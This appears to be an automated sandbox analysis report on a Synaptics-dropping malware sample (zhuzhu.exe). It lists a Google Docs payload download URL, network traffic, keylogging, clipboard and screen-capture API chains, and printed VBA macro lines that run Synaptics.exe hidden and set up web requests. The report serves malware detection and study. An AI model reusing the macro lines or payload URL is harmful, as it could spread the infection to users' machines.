                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadte
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadted
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth_Yj
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtiPKB_o
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtion-
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadts
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtubec
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu-
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu2
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadud
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurHJZ
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurce.
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadus;
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadute.
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv6
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv=
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadveY
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadviGc
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvn
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx1
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx6c
                                      Source: Synaptics.exe, 00000002.00000002.2505301533.0000000015E3E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxM
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxsMXG
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady1
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady9
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady:
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady=w_#
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..yy
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443

                                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe Code function: [esc] 4_2_0377E850
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe Code function: 4_2_0377E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex, 4_2_0377E850
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe Code function: 4_2_0377BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC, 4_2_0377BC70
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe Code function: 4_2_0377E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState, 4_2_0377E4F0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll
                                      Source: Yara match File source: zhuzhu.exe, type: SAMPLE
                                      Source: Yara match File source: 0.0.zhuzhu.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 1.0.._cache_zhuzhu.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 00000001.00000000.1664705656.00000000006F9000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
                                      Source: Yara match File source: 00000000.00000000.1657356123.00000000004A5000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                      Source: Yara match File source: 00000000.00000003.1666861585.00000000067FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara match File source: Process Memory Space: zhuzhu.exe PID: 6652, type: MEMORYSTR
                                      Source: Yara match File source: Process Memory Space: ._cache_zhuzhu.exe PID: 3624, type: MEMORYSTR
                                      Source: Yara match File source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe, type: DROPPED
                                      Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                      Source: Yara match File source: C:\Users\user\Desktop\._cache_zhuzhu.exe, type: DROPPED

                                      E-Banking Fraud

                                      Source: C:\Users\user\Downloads\inst.exe Code function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW, Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads 7_2_001B8A46

                                      Operating System Destruction

                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe | Process information set: 01 00 00 00

                                      System Summary

                                      Source: FHfEA7As.xlsm.2.dr | OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                      Source: FHfEA7As.xlsm.2.dr | OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                      Source: FHfEA7As.xlsm.2.dr | OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                      Source: FHfEA7As.xlsm.2.dr | OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                      Source: FHfEA7As.xlsm.2.dr | OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                      Source: FHfEA7As.xlsm.2.dr | OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                      Source: FHfEA7As.xlsm.2.dr | OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                      Source: FHfEA7As.xlsm.2.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                      Source: FHfEA7As.xlsm.2.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                      Source: XZXHAVGRAG.xlsm.2.dr | OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                      Source: XZXHAVGRAG.xlsm.2.dr | OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                      Source: XZXHAVGRAG.xlsm.2.dr | OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                      Source: XZXHAVGRAG.xlsm.2.dr | OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                      Source: XZXHAVGRAG.xlsm.2.dr | OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                      Source: XZXHAVGRAG.xlsm.2.dr | OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                      Source: XZXHAVGRAG.xlsm.2.dr | OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                      Source: XZXHAVGRAG.xlsm.2.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                      Source: XZXHAVGRAG.xlsm.2.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                      Source: FHfEA7As.xlsm.2.dr | Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
